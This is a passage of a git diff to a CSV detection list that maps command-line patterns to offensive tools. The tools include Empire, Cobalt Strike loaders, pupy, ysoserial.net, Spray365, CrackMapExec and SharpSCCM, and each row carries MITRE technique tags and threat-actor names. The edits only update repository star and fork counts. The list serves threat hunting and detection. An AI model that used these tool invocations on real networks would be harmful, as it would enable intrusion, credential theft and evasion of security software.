- T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "* -format=service-exe *.exe*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" @@ -672,10 +672,10 @@ "* ftp-vsftpd-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ftp-vuln-cve2010-4221.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* FudgeC2 *","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"* -FullPrivs * ","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -FullPrivs * ","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --functions NtProtectVirtualMemory*NtWriteVirtualMemory -o syscalls_mem*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1059 - T1573 - T1218 - T1216","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z" -"* fuzz -u * -p *--target*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1359","152","2023-09-22T07:44:36Z","2022-06-30T16:52:33Z" -"* FUZZ:FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* fuzz -u * -p *--target*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z" +"* FUZZ:FUZZ *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* --fuzzers addition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers bitsquatting*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers cyrillic*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" @@ -689,43 +689,43 @@ "* --fuzzers subdomain*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers transposition*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" "* --fuzzers vowel-swap*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" -"* -g ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -g ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -g -n --kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* -g PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* -g TextFormattingRunProperties *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* --gadget ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* --gadget ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" -"* --gadget PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g -n --kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -g PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -g TextFormattingRunProperties *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ActivitySurrogateSelector*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget ClaimsPrincipal *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* --gadget PSObject *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* ganglia-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* GC2-sheet*","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","0","N/A","10","10","449","89","2023-07-06T19:22:36Z","2021-09-15T19:06:12Z" "* gcat.py -*","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" -"* gen -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"* gen -S -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* gen -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* gen -S -f client -O windows -A x64*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* generate audit -ep *--passwords_in_userfile*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep * -d * -u * -pf *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "* generate normal -ep ex-plan.s365 *","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" -"* generate_my_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1068","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" +"* generate_my_dll*","offensive_tool_keyword","cobaltstrike","A proof-of-concept Cobalt Strike Reflective Loader which aims to recreate. integrate. and enhance Cobalt Strike's evasion features!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","0","N/A","10","10","1070","227","2023-09-08T10:09:19Z","2021-08-15T18:17:28Z" "* generatePayload*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" -"* --gen-relay-list *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"* --gen-relay-list /tmp/relaylistOutputFilename.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* --gen-relay-list *","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* --gen-relay-list /tmp/relaylistOutputFilename.txt*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* get class-instances SMS_R_System *","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation 